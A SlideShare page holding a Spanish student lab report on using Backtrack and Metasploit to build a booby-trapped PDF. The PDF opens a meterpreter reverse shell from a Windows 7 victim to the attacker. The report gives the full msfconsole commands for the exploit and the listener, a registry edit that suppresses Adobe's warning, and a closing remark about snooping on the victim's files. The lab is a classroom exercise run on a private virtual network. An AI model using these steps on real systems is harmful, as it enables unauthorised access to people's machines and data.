SlideShare una empresa de Scribd logo
1 de 8
Descargar para leer sin conexión
HACKING BACKTRACK 1

OBJETIVO DE LA PRÁCTICA

Desearemos desde un PC atacante hacer una conexión remota a un PC víctima.
Esta conexión será “malintencionada” y se realizará desde el puerto 4444 a través del Sistema
Operativo Backtrack creando un archivo .PDF infectado y enviándolo al PC víctima.
Una vez el PC victima abra el archivo, se abrirá un backdoor y desde el PC atacante podremos
acceder a la Shell de la víctima y podremos visualizar todo su contenido.

DETALLES A TENER EN CUENTA

La realización de esta práctica ha supuesto unas complicaciones externas debido a algunos
detalles que explicaremos a continuación.







Trabajaremos con MSFConsole en el entorno Backtrack.
Cuando se crea el PDF, tenemos que agregar la IP del Atacante en el comando lhost.
La versión de Adobe Reader que debe tener el cliente será la 9.0.
Se han editado los registros de Adobe Reader para permitir el uso del .exe.
Se ignorará el hecho de realizar la conexión con el puerto 443.
La víctima debe tener desactivado el Firewall.
ESQUEMA DE LA PRÁCTICA

Equipo atacante = 192.168.1.2
Equipo víctima = 192.168.1.3
Como podemos ver en el dibujo, ambos PCs deben estar conectados en la misma red para
realizarse el ataque. Para ello los hemos puesto a ambos en una VMnet juntos.
El Equipo víctima será quien tenga el .PDF infectado y quien será atacado por el equipo 1.2.

PROCEDIMIENTO DE LA PRÁCTICA

Para empezar la práctica, primero de todos tendremos que contar con un sistema operativo
llamado Backtrack, basado en distribuciones Linux. Este O.S. es una herramienta bastante
particular basada en este tipo de ejemplos y prácticas en cuanto a “jugar” con la red.
El primer paso será crear un archivo .PDF. Éste será la base de nuestro ataque. Gracias a él
podremos infectar a la víctima una vez abra el archivo que le enviaremos.
Abriremos la terminal del Backtrack y utilizaremos la MSFConsole. Esta consola se centra y
permite un acceso eficiente a las opciones relacionadas con los Exploits que se utilizarán.
Gracias a ésta, se facilita el uso de las herramientas.
CREACIÓN DEL PDF…

A la hora de crear el PDF, tenemos que tener en cuenta los siguientes comandos (que
utilizaremos):


use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs.
Sirve para decirle que vamos a utilizer un exploit con Adobe PDF embedded y un .exe como
extensión.



set payload windows/meterpreter/reverse_tcp
Es el Payload, que nos devolverá un Meterpreter. El Payload traducido es la carga útil, es la
información del envío de datos que usaremos para el ataque.



set lhost 192.168.1.2.
Añadiremos la IP del Atacante.



set filename vellimalote.pdf
Crearemos un PDF con el nombre indicado.



Exploit
Cargaremos el exploit para que se cree.
TRANSMISIÓN DEL ARCHIVO

Ahora, de cualquier forma tenemos que conseguir que la víctima reciba dicho archivo PDF
creado.
En este paso nosotros directamente lo hemos enviado o traspasado por un USB para facilitar el
uso de éste.
Localizaremos el archivo, en la ruta donde se ha guardado:
/msf4/local/vellimalote.pdf

*Hay dos archivos, vellimalo y vellimalote porque se hicieron varias pruebas. Pero el que nos
servirá y estamos utilizando es Vellimalote.pdf
Enviaremos el archivo a la máquina Windows 7, que será la víctima:

Hay que tener en cuenta, que la víctima debe tener un Adobe Reader inferior a la versión 9.3.
En nuestro caso utilizaremos la 9.0, que no dará muchos problemas a la hora de realizar la
apertura del archivo.
DETALLES DE ADOBE READER

La realización de la práctica ha sido ardua básicamente por los permisos y versiones de Adobe
Reader.
Para que funcionara 100% hemos hecho unos cambios, encontrados en Internet.


Actualizar el registro de Adobe Reader.
Después de una búsqueda exhaustiva por Internet, muchos usuarios coincidían en que
el registro de Adobe Reader debía ser cambiado.
Para ello utilizaremos la herramienta de Windows, “regedit” y seguiremos la siguiente
ruta:
HKEY_LOCAL_Machine / Software / Policies / Adobe / Acrobat Reader / 9.0 /
FeatureLockDown / cDefaultLaunchAttachmentPerms
Una vez dentro, veremos esto:

Editaremos el registro “BuiltInPermList” y le quitaremos la extensión .exe.
De esta forma, cuando abramos el archivo PDF no nos surgirá ningún mensaje molesto
relacionado con la infección o el mal uso del archivo.
EMPIEZA EL ATAQUE

Una vez solucionados todos los problemas con la víctima, realizaremos el ataque desde
nuestro atacante, valga la redundancia.
Utilizaremos los siguientes comandos:

 Use exploit/multi/handler
Utilizaremos el controlador del Exploit.

 Set payload Windows/meterpreter/reverse_tcp
Utilización del TCP (lo mismo que cuando creamos el PDF).

 Set lhost 192.168.1.2
Agregamos la IP del atacante.

 Exploit
Arrancamos el exploit.

El ataque será enviado mediante escucha. Es decir, que cuando la víctima abra el archivo
infectado (enviado anteriormente, el PDF) será cuando el atacante podrá entrar en la Shell del
usuario y entonces el ataque habrá sido realizado correctamente.
MODO ESCUCHA

La víctima abrirá el archivo PDF y comprobará que le sale una terminal extraña, que
desaparecerá al momento.
Cuando el usuario víctima ve esto, en la mayoría de los casos se despreocupa y sigue realizando
las tareas que estaba haciendo, pero realmente este ha sido el momento de infección, ya que el
atacante ha podido realizar la conexión.

El atacante estará esperando (modo escucha) y verá cómo se crea la conexión:
Dentro del parámetro meterpreter, ponemos “Shell” para meternos dentro del PC de la
víctima, sin que éste se dé cuenta de nada.

Y como podemos ver, ya estamos dentro del Desktop de la víctima:

A partir de ahora podemos navegar por el PC de la víctima y realizar maldades o simplemente
ser un cotilla y ver toda la información que tiene el usuario.

José Mª Vellido – ASIX2M
Hacking Backtrack 1 – SEGDISP
Fran Pérez – 2013/2014

Más contenido relacionado

La actualidad más candente

Aironux El Sustituto De Ares Para Linux
Aironux El Sustituto De Ares Para Linux
Aironux El Sustituto De Ares Para Linux
Aironux El Sustituto De Ares Para Linux heavenlycage2797
 
Penetración con una Backdoor
Penetración con una BackdoorPenetración con una Backdoor
Penetración con una BackdoorNEGOCIOS PROPIOS
 
Ethical hacking 03
Ethical hacking 03Ethical hacking 03
Ethical hacking 03Tensor
 
Ethical hacking 02
Ethical hacking 02Ethical hacking 02
Ethical hacking 02Tensor
 
Proyectos JAVA con maven
Proyectos JAVA con mavenProyectos JAVA con maven
Proyectos JAVA con mavenJuan Vladimir
 
Pasos para instalar windows 7
Pasos para instalar windows 7Pasos para instalar windows 7
Pasos para instalar windows 7Hëiinër Därk
 
Meterpreter en android el desembarco en tu smartphone
Meterpreter en android   el desembarco en tu smartphoneMeterpreter en android   el desembarco en tu smartphone
Meterpreter en android el desembarco en tu smartphoneJASENT
 
Armitage pruebas
Armitage pruebasArmitage pruebas
Armitage pruebasTensor
 
Subiendo shell explotando lfi via php input
Subiendo shell explotando lfi via php   inputSubiendo shell explotando lfi via php   input
Subiendo shell explotando lfi via php inputTensor
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandboxTensor
 
Instalar php 5 en windows 7 con apache
Instalar php 5 en windows 7 con apacheInstalar php 5 en windows 7 con apache
Instalar php 5 en windows 7 con apacheEsmeralda Lopez
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandboxTensor
 

La actualidad más candente (18)

Aironux El Sustituto De Ares Para Linux
Aironux El Sustituto De Ares Para Linux
Aironux El Sustituto De Ares Para Linux
Aironux El Sustituto De Ares Para Linux
 
Penetración con una Backdoor
Penetración con una BackdoorPenetración con una Backdoor
Penetración con una Backdoor
 
Instalar Robocup Windows
Instalar Robocup WindowsInstalar Robocup Windows
Instalar Robocup Windows
 
Ataque DNS Spoofing
Ataque DNS SpoofingAtaque DNS Spoofing
Ataque DNS Spoofing
 
Linux
LinuxLinux
Linux
 
Ethical hacking 03
Ethical hacking 03Ethical hacking 03
Ethical hacking 03
 
Ethical hacking 02
Ethical hacking 02Ethical hacking 02
Ethical hacking 02
 
Kali Linux
Kali LinuxKali Linux
Kali Linux
 
Proyectos JAVA con maven
Proyectos JAVA con mavenProyectos JAVA con maven
Proyectos JAVA con maven
 
Linux
LinuxLinux
Linux
 
Pasos para instalar windows 7
Pasos para instalar windows 7Pasos para instalar windows 7
Pasos para instalar windows 7
 
Meterpreter en android el desembarco en tu smartphone
Meterpreter en android   el desembarco en tu smartphoneMeterpreter en android   el desembarco en tu smartphone
Meterpreter en android el desembarco en tu smartphone
 
Armitage pruebas
Armitage pruebasArmitage pruebas
Armitage pruebas
 
Subiendo shell explotando lfi via php input
Subiendo shell explotando lfi via php   inputSubiendo shell explotando lfi via php   input
Subiendo shell explotando lfi via php input
 
Ataque Dns spoofing
Ataque Dns spoofingAtaque Dns spoofing
Ataque Dns spoofing
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandbox
 
Instalar php 5 en windows 7 con apache
Instalar php 5 en windows 7 con apacheInstalar php 5 en windows 7 con apache
Instalar php 5 en windows 7 con apache
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandbox
 

Destacado

Enrutamiento estático pràctica 2 sol
Enrutamiento estático pràctica 2 solEnrutamiento estático pràctica 2 sol
Enrutamiento estático pràctica 2 solFrancesc Perez
 
Seguridad: Backtrack2
Seguridad: Backtrack2 Seguridad: Backtrack2
Seguridad: Backtrack2 Francesc Perez
 
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...Francesc Perez
 
Unicode - Hacking The International Character System
Unicode - Hacking The International Character SystemUnicode - Hacking The International Character System
Unicode - Hacking The International Character SystemWebsecurify
 
Conmutación LAn e inalámbrica: 5.1 VTP
Conmutación LAn e inalámbrica: 5.1 VTPConmutación LAn e inalámbrica: 5.1 VTP
Conmutación LAn e inalámbrica: 5.1 VTPFrancesc Perez
 
Exercici html5, js y css3
Exercici html5, js y css3Exercici html5, js y css3
Exercici html5, js y css3Francesc Perez
 
Proyecto: Seguridad en redes informáticas
Proyecto: Seguridad en redes informáticasProyecto: Seguridad en redes informáticas
Proyecto: Seguridad en redes informáticasFrancesc Perez
 
Trabajo práctico n° 3 seguridad informática
Trabajo práctico n° 3 seguridad informáticaTrabajo práctico n° 3 seguridad informática
Trabajo práctico n° 3 seguridad informáticaMaria Jose
 
Seguridad informatica
Seguridad informatica Seguridad informatica
Seguridad informatica Sandra Quevedo
 
Fundamentos de redes: 3. Funcionalidad y protocolos de la capa de aplicación
Fundamentos de redes: 3. Funcionalidad y protocolos de la capa de aplicaciónFundamentos de redes: 3. Funcionalidad y protocolos de la capa de aplicación
Fundamentos de redes: 3. Funcionalidad y protocolos de la capa de aplicaciónFrancesc Perez
 
Fundamentos de redes: 4. La capa de transporte del modelo OSI
Fundamentos de redes: 4. La capa de transporte del modelo OSIFundamentos de redes: 4. La capa de transporte del modelo OSI
Fundamentos de redes: 4. La capa de transporte del modelo OSIFrancesc Perez
 
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...Francesc Perez
 
File Transfer Protocol
File Transfer ProtocolFile Transfer Protocol
File Transfer ProtocolFrancesc Perez
 
Dynamic Host Configuration Protocol
Dynamic Host Configuration ProtocolDynamic Host Configuration Protocol
Dynamic Host Configuration ProtocolFrancesc Perez
 
Fundamentos de redes: 2. Comunicación a través de la red
Fundamentos de redes: 2. Comunicación a través de la redFundamentos de redes: 2. Comunicación a través de la red
Fundamentos de redes: 2. Comunicación a través de la redFrancesc Perez
 

Destacado (20)

Enrutamiento estático pràctica 2 sol
Enrutamiento estático pràctica 2 solEnrutamiento estático pràctica 2 sol
Enrutamiento estático pràctica 2 sol
 
ICT Parte 1/2
ICT Parte 1/2ICT Parte 1/2
ICT Parte 1/2
 
Seguridad: Backtrack2
Seguridad: Backtrack2 Seguridad: Backtrack2
Seguridad: Backtrack2
 
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...
Conceptos y protocolos de enrutamiento: 3.3 Enrutamiento dinámico y redistrib...
 
Unicode - Hacking The International Character System
Unicode - Hacking The International Character SystemUnicode - Hacking The International Character System
Unicode - Hacking The International Character System
 
Js api formularios
Js api formulariosJs api formularios
Js api formularios
 
Conmutación LAn e inalámbrica: 5.1 VTP
Conmutación LAn e inalámbrica: 5.1 VTPConmutación LAn e inalámbrica: 5.1 VTP
Conmutación LAn e inalámbrica: 5.1 VTP
 
Exercici html5, js y css3
Exercici html5, js y css3Exercici html5, js y css3
Exercici html5, js y css3
 
Proyecto: Seguridad en redes informáticas
Proyecto: Seguridad en redes informáticasProyecto: Seguridad en redes informáticas
Proyecto: Seguridad en redes informáticas
 
1a seguridad informatica
1a seguridad informatica1a seguridad informatica
1a seguridad informatica
 
Virus y vacunas informáaticas
Virus y vacunas informáaticasVirus y vacunas informáaticas
Virus y vacunas informáaticas
 
Trabajo práctico n° 3 seguridad informática
Trabajo práctico n° 3 seguridad informáticaTrabajo práctico n° 3 seguridad informática
Trabajo práctico n° 3 seguridad informática
 
Seguridad informatica
Seguridad informatica Seguridad informatica
Seguridad informatica
 
Hoja de vida
Hoja de vidaHoja de vida
Hoja de vida
 
Fundamentos de redes: 3. Funcionalidad y protocolos de la capa de aplicación
Fundamentos de redes: 3. Funcionalidad y protocolos de la capa de aplicaciónFundamentos de redes: 3. Funcionalidad y protocolos de la capa de aplicación
Fundamentos de redes: 3. Funcionalidad y protocolos de la capa de aplicación
 
Fundamentos de redes: 4. La capa de transporte del modelo OSI
Fundamentos de redes: 4. La capa de transporte del modelo OSIFundamentos de redes: 4. La capa de transporte del modelo OSI
Fundamentos de redes: 4. La capa de transporte del modelo OSI
 
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...
Conceptos y protocolos de enrutamiento: 2.2 Enrutamiento estatico y Traducció...
 
File Transfer Protocol
File Transfer ProtocolFile Transfer Protocol
File Transfer Protocol
 
Dynamic Host Configuration Protocol
Dynamic Host Configuration ProtocolDynamic Host Configuration Protocol
Dynamic Host Configuration Protocol
 
Fundamentos de redes: 2. Comunicación a través de la red
Fundamentos de redes: 2. Comunicación a través de la redFundamentos de redes: 2. Comunicación a través de la red
Fundamentos de redes: 2. Comunicación a través de la red
 

Similar a Seguridad: Backtrack1_bis

Manual de hacking basico por taskkill#3
Manual de hacking basico por taskkill#3Manual de hacking basico por taskkill#3
Manual de hacking basico por taskkill#3Brat Stell
 
Cuckoosandbox
CuckoosandboxCuckoosandbox
CuckoosandboxTensor
 
Instalación KOHA: desarrollo, requerimientos y configuración
Instalación KOHA: desarrollo, requerimientos y configuraciónInstalación KOHA: desarrollo, requerimientos y configuración
Instalación KOHA: desarrollo, requerimientos y configuraciónSocialBiblio
 
PelicanHPC Implementación fisica con dos nodos
PelicanHPC Implementación fisica con dos nodosPelicanHPC Implementación fisica con dos nodos
PelicanHPC Implementación fisica con dos nodosIvan Luis Jimenez
 
Análisis técnico de Flashback, el troyano para Mac que ya ha infectado a más ...
Análisis técnico de Flashback, el troyano para Mac que ya ha infectado a más ...Análisis técnico de Flashback, el troyano para Mac que ya ha infectado a más ...
Análisis técnico de Flashback, el troyano para Mac que ya ha infectado a más ...Yolanda Ruiz Hervás
 
Linux ud13 - iniciar sesion en linux de forma remota
Linux   ud13 - iniciar sesion en linux de forma remotaLinux   ud13 - iniciar sesion en linux de forma remota
Linux ud13 - iniciar sesion en linux de forma remotaJavier Muñoz
 
Pent box security suite
Pent box security suitePent box security suite
Pent box security suiteTensor
 
Presentacion re y_des_09072003
Presentacion re y_des_09072003Presentacion re y_des_09072003
Presentacion re y_des_09072003Alonso Caballero
 
97132962-instalacion-de-open meetings-en-squeeze
 97132962-instalacion-de-open meetings-en-squeeze 97132962-instalacion-de-open meetings-en-squeeze
97132962-instalacion-de-open meetings-en-squeezexavazquez
 
Pent box security
Pent box securityPent box security
Pent box securityTensor
 
Pent box security
Pent box securityPent box security
Pent box securityTensor
 
Pent box security
Pent box securityPent box security
Pent box securityTensor
 
Pent box security
Pent box securityPent box security
Pent box securityTensor
 
Pent box security
Pent box securityPent box security
Pent box securityTensor
 
Servidor WEB
Servidor WEBServidor WEB
Servidor WEBLenidav
 

Similar a Seguridad: Backtrack1_bis (20)

Presentacion eduin gonzalez
Presentacion eduin gonzalezPresentacion eduin gonzalez
Presentacion eduin gonzalez
 
Manual de hacking basico por taskkill#3
Manual de hacking basico por taskkill#3Manual de hacking basico por taskkill#3
Manual de hacking basico por taskkill#3
 
Cuckoosandbox
CuckoosandboxCuckoosandbox
Cuckoosandbox
 
Instalación KOHA: desarrollo, requerimientos y configuración
Instalación KOHA: desarrollo, requerimientos y configuraciónInstalación KOHA: desarrollo, requerimientos y configuración
Instalación KOHA: desarrollo, requerimientos y configuración
 
Ataque win xp
Ataque win xpAtaque win xp
Ataque win xp
 
PelicanHPC Implementación fisica con dos nodos
PelicanHPC Implementación fisica con dos nodosPelicanHPC Implementación fisica con dos nodos
PelicanHPC Implementación fisica con dos nodos
 
Análisis técnico de Flashback, el troyano para Mac que ya ha infectado a más ...
Análisis técnico de Flashback, el troyano para Mac que ya ha infectado a más ...Análisis técnico de Flashback, el troyano para Mac que ya ha infectado a más ...
Análisis técnico de Flashback, el troyano para Mac que ya ha infectado a más ...
 
Linux ud13 - iniciar sesion en linux de forma remota
Linux   ud13 - iniciar sesion en linux de forma remotaLinux   ud13 - iniciar sesion en linux de forma remota
Linux ud13 - iniciar sesion en linux de forma remota
 
Sallis Usb Hacks
Sallis Usb HacksSallis Usb Hacks
Sallis Usb Hacks
 
Pent box security suite
Pent box security suitePent box security suite
Pent box security suite
 
Presentacion re y_des_09072003
Presentacion re y_des_09072003Presentacion re y_des_09072003
Presentacion re y_des_09072003
 
97132962-instalacion-de-open meetings-en-squeeze
 97132962-instalacion-de-open meetings-en-squeeze 97132962-instalacion-de-open meetings-en-squeeze
97132962-instalacion-de-open meetings-en-squeeze
 
Pent box security
Pent box securityPent box security
Pent box security
 
Pent box security
Pent box securityPent box security
Pent box security
 
Pent box security
Pent box securityPent box security
Pent box security
 
Pent box security
Pent box securityPent box security
Pent box security
 
Pent box security
Pent box securityPent box security
Pent box security
 
John the Ripper
John the RipperJohn the Ripper
John the Ripper
 
Present3
Present3Present3
Present3
 
Servidor WEB
Servidor WEBServidor WEB
Servidor WEB
 

Más de Francesc Perez

Conmutación LAN e inalámbrica: 5.2 VTP Solución
Conmutación LAN e inalámbrica: 5.2 VTP SoluciónConmutación LAN e inalámbrica: 5.2 VTP Solución
Conmutación LAN e inalámbrica: 5.2 VTP SoluciónFrancesc Perez
 
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...Francesc Perez
 
Sistemas digitales combinacionales: Multiplexador
Sistemas digitales combinacionales: MultiplexadorSistemas digitales combinacionales: Multiplexador
Sistemas digitales combinacionales: MultiplexadorFrancesc Perez
 
Ejercicios funciones lógicas
Ejercicios funciones lógicasEjercicios funciones lógicas
Ejercicios funciones lógicasFrancesc Perez
 
Sistemas electrónicos digitales pràctica 1
Sistemas electrónicos digitales   pràctica 1Sistemas electrónicos digitales   pràctica 1
Sistemas electrónicos digitales pràctica 1Francesc Perez
 
Sistemas digitales comb inacionales: Propiedades de boole
Sistemas digitales comb inacionales: Propiedades de booleSistemas digitales comb inacionales: Propiedades de boole
Sistemas digitales comb inacionales: Propiedades de booleFrancesc Perez
 
Sistemas digitales comb inacionales: Teoremas de boole
Sistemas digitales comb inacionales: Teoremas de booleSistemas digitales comb inacionales: Teoremas de boole
Sistemas digitales comb inacionales: Teoremas de booleFrancesc Perez
 
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informáticaSeguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informáticaFrancesc Perez
 
La fuente de alimentación
La fuente de alimentación  La fuente de alimentación
La fuente de alimentación Francesc Perez
 
Componentes de un sistema informático
Componentes de un sistema informáticoComponentes de un sistema informático
Componentes de un sistema informáticoFrancesc Perez
 
Introducción al desarrollo de aplicaciones para dispositivos móviles
Introducción al desarrollo de aplicaciones para dispositivos móvilesIntroducción al desarrollo de aplicaciones para dispositivos móviles
Introducción al desarrollo de aplicaciones para dispositivos móvilesFrancesc Perez
 
Fuente de alimentación y osciloscopio (ewb)
Fuente de alimentación y osciloscopio (ewb)Fuente de alimentación y osciloscopio (ewb)
Fuente de alimentación y osciloscopio (ewb)Francesc Perez
 
Circuitos capacitivos practia 1
Circuitos capacitivos   practia 1Circuitos capacitivos   practia 1
Circuitos capacitivos practia 1Francesc Perez
 
Amplificador operacional practica 1
Amplificador operacional  practica 1Amplificador operacional  practica 1
Amplificador operacional practica 1Francesc Perez
 

Más de Francesc Perez (20)

Conmutación LAN e inalámbrica: 5.2 VTP Solución
Conmutación LAN e inalámbrica: 5.2 VTP SoluciónConmutación LAN e inalámbrica: 5.2 VTP Solución
Conmutación LAN e inalámbrica: 5.2 VTP Solución
 
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...
Sistemas digitales secuenciales: Contador binario módulo 10 con display siete...
 
Sistemas digitales combinacionales: Multiplexador
Sistemas digitales combinacionales: MultiplexadorSistemas digitales combinacionales: Multiplexador
Sistemas digitales combinacionales: Multiplexador
 
Ejercicios funciones lógicas
Ejercicios funciones lógicasEjercicios funciones lógicas
Ejercicios funciones lógicas
 
Sistemas electrónicos digitales pràctica 1
Sistemas electrónicos digitales   pràctica 1Sistemas electrónicos digitales   pràctica 1
Sistemas electrónicos digitales pràctica 1
 
html5 multimedia
 html5 multimedia html5 multimedia
html5 multimedia
 
Sistemas digitales comb inacionales: Propiedades de boole
Sistemas digitales comb inacionales: Propiedades de booleSistemas digitales comb inacionales: Propiedades de boole
Sistemas digitales comb inacionales: Propiedades de boole
 
Estudio del PC
Estudio del PCEstudio del PC
Estudio del PC
 
Sistemas digitales comb inacionales: Teoremas de boole
Sistemas digitales comb inacionales: Teoremas de booleSistemas digitales comb inacionales: Teoremas de boole
Sistemas digitales comb inacionales: Teoremas de boole
 
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informáticaSeguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
 
La fuente de alimentación
La fuente de alimentación  La fuente de alimentación
La fuente de alimentación
 
Componentes de un sistema informático
Componentes de un sistema informáticoComponentes de un sistema informático
Componentes de un sistema informático
 
Javascript
JavascriptJavascript
Javascript
 
css3
css3css3
css3
 
html5
html5html5
html5
 
Introducción al desarrollo de aplicaciones para dispositivos móviles
Introducción al desarrollo de aplicaciones para dispositivos móvilesIntroducción al desarrollo de aplicaciones para dispositivos móviles
Introducción al desarrollo de aplicaciones para dispositivos móviles
 
Fuente de alimentación y osciloscopio (ewb)
Fuente de alimentación y osciloscopio (ewb)Fuente de alimentación y osciloscopio (ewb)
Fuente de alimentación y osciloscopio (ewb)
 
Manual ewb
Manual ewbManual ewb
Manual ewb
 
Circuitos capacitivos practia 1
Circuitos capacitivos   practia 1Circuitos capacitivos   practia 1
Circuitos capacitivos practia 1
 
Amplificador operacional practica 1
Amplificador operacional  practica 1Amplificador operacional  practica 1
Amplificador operacional practica 1
 

Último

Fichas de matemática DE PRIMERO DE SECUNDARIA.pdf
Fichas de matemática DE PRIMERO DE SECUNDARIA.pdfFichas de matemática DE PRIMERO DE SECUNDARIA.pdf
Fichas de matemática DE PRIMERO DE SECUNDARIA.pdfssuser50d1252
 
Tema 8.- Gestion de la imagen a traves de la comunicacion de crisis.pdf
Tema 8.- Gestion de la imagen a traves de la comunicacion de crisis.pdfTema 8.- Gestion de la imagen a traves de la comunicacion de crisis.pdf
Tema 8.- Gestion de la imagen a traves de la comunicacion de crisis.pdfDaniel Ángel Corral de la Mata, Ph.D.
 
CIENCIAS NATURALES 4 TO ambientes .docx
CIENCIAS NATURALES 4 TO  ambientes .docxCIENCIAS NATURALES 4 TO  ambientes .docx
CIENCIAS NATURALES 4 TO ambientes .docxAgustinaNuez21
 
Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...
Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...
Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...fcastellanos3
 
sesión de aprendizaje 4 E1 Exposición oral.pdf
sesión de aprendizaje 4 E1 Exposición oral.pdfsesión de aprendizaje 4 E1 Exposición oral.pdf
sesión de aprendizaje 4 E1 Exposición oral.pdfpatriciavsquezbecerr
 
Día de la Madre Tierra-1.pdf día mundial
Día de la Madre Tierra-1.pdf día mundialDía de la Madre Tierra-1.pdf día mundial
Día de la Madre Tierra-1.pdf día mundialpatriciaines1993
 
PROGRAMACION ANUAL DE MATEMATICA 2024.docx
PROGRAMACION ANUAL DE MATEMATICA 2024.docxPROGRAMACION ANUAL DE MATEMATICA 2024.docx
PROGRAMACION ANUAL DE MATEMATICA 2024.docxEribertoPerezRamirez
 
Uses of simple past and time expressions
Uses of simple past and time expressionsUses of simple past and time expressions
Uses of simple past and time expressionsConsueloSantana3
 
EDUCACION FISICA 1° PROGRAMACIÓN ANUAL 2023.docx
EDUCACION FISICA 1°  PROGRAMACIÓN ANUAL 2023.docxEDUCACION FISICA 1°  PROGRAMACIÓN ANUAL 2023.docx
EDUCACION FISICA 1° PROGRAMACIÓN ANUAL 2023.docxLuisAndersonPachasto
 
cuadernillo de lectoescritura para niños de básica
cuadernillo de lectoescritura para niños de básicacuadernillo de lectoescritura para niños de básica
cuadernillo de lectoescritura para niños de básicaGianninaValeskaContr
 
Fisiologia.Articular. 3 Kapandji.6a.Ed.pdf
Fisiologia.Articular. 3 Kapandji.6a.Ed.pdfFisiologia.Articular. 3 Kapandji.6a.Ed.pdf
Fisiologia.Articular. 3 Kapandji.6a.Ed.pdfcoloncopias5
 
Fichas de MatemáticA QUINTO DE SECUNDARIA).pdf
Fichas de MatemáticA QUINTO DE SECUNDARIA).pdfFichas de MatemáticA QUINTO DE SECUNDARIA).pdf
Fichas de MatemáticA QUINTO DE SECUNDARIA).pdfssuser50d1252
 
Actividad transversal 2-bloque 2. Actualización 2024
Actividad transversal 2-bloque 2. Actualización 2024Actividad transversal 2-bloque 2. Actualización 2024
Actividad transversal 2-bloque 2. Actualización 2024Rosabel UA
 
DETALLES EN EL DISEÑO DE INTERIOR
DETALLES EN EL DISEÑO DE INTERIORDETALLES EN EL DISEÑO DE INTERIOR
DETALLES EN EL DISEÑO DE INTERIORGonella
 
Manejo del Dengue, generalidades, actualización marzo 2024 minsa
Manejo del Dengue, generalidades, actualización marzo 2024 minsaManejo del Dengue, generalidades, actualización marzo 2024 minsa
Manejo del Dengue, generalidades, actualización marzo 2024 minsaLuis Minaya
 
FICHA DE MONITOREO Y ACOMPAÑAMIENTO 2024 MINEDU
FICHA DE MONITOREO Y ACOMPAÑAMIENTO  2024 MINEDUFICHA DE MONITOREO Y ACOMPAÑAMIENTO  2024 MINEDU
FICHA DE MONITOREO Y ACOMPAÑAMIENTO 2024 MINEDUgustavorojas179704
 

Último (20)

Fichas de matemática DE PRIMERO DE SECUNDARIA.pdf
Fichas de matemática DE PRIMERO DE SECUNDARIA.pdfFichas de matemática DE PRIMERO DE SECUNDARIA.pdf
Fichas de matemática DE PRIMERO DE SECUNDARIA.pdf
 
Tema 8.- Gestion de la imagen a traves de la comunicacion de crisis.pdf
Tema 8.- Gestion de la imagen a traves de la comunicacion de crisis.pdfTema 8.- Gestion de la imagen a traves de la comunicacion de crisis.pdf
Tema 8.- Gestion de la imagen a traves de la comunicacion de crisis.pdf
 
CIENCIAS NATURALES 4 TO ambientes .docx
CIENCIAS NATURALES 4 TO  ambientes .docxCIENCIAS NATURALES 4 TO  ambientes .docx
CIENCIAS NATURALES 4 TO ambientes .docx
 
Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...
Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...
Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...
 
sesión de aprendizaje 4 E1 Exposición oral.pdf
sesión de aprendizaje 4 E1 Exposición oral.pdfsesión de aprendizaje 4 E1 Exposición oral.pdf
sesión de aprendizaje 4 E1 Exposición oral.pdf
 
Día de la Madre Tierra-1.pdf día mundial
Día de la Madre Tierra-1.pdf día mundialDía de la Madre Tierra-1.pdf día mundial
Día de la Madre Tierra-1.pdf día mundial
 
PROGRAMACION ANUAL DE MATEMATICA 2024.docx
PROGRAMACION ANUAL DE MATEMATICA 2024.docxPROGRAMACION ANUAL DE MATEMATICA 2024.docx
PROGRAMACION ANUAL DE MATEMATICA 2024.docx
 
La luz brilla en la oscuridad. Necesitamos luz
La luz brilla en la oscuridad. Necesitamos luzLa luz brilla en la oscuridad. Necesitamos luz
La luz brilla en la oscuridad. Necesitamos luz
 
Uses of simple past and time expressions
Uses of simple past and time expressionsUses of simple past and time expressions
Uses of simple past and time expressions
 
EDUCACION FISICA 1° PROGRAMACIÓN ANUAL 2023.docx
EDUCACION FISICA 1°  PROGRAMACIÓN ANUAL 2023.docxEDUCACION FISICA 1°  PROGRAMACIÓN ANUAL 2023.docx
EDUCACION FISICA 1° PROGRAMACIÓN ANUAL 2023.docx
 
cuadernillo de lectoescritura para niños de básica
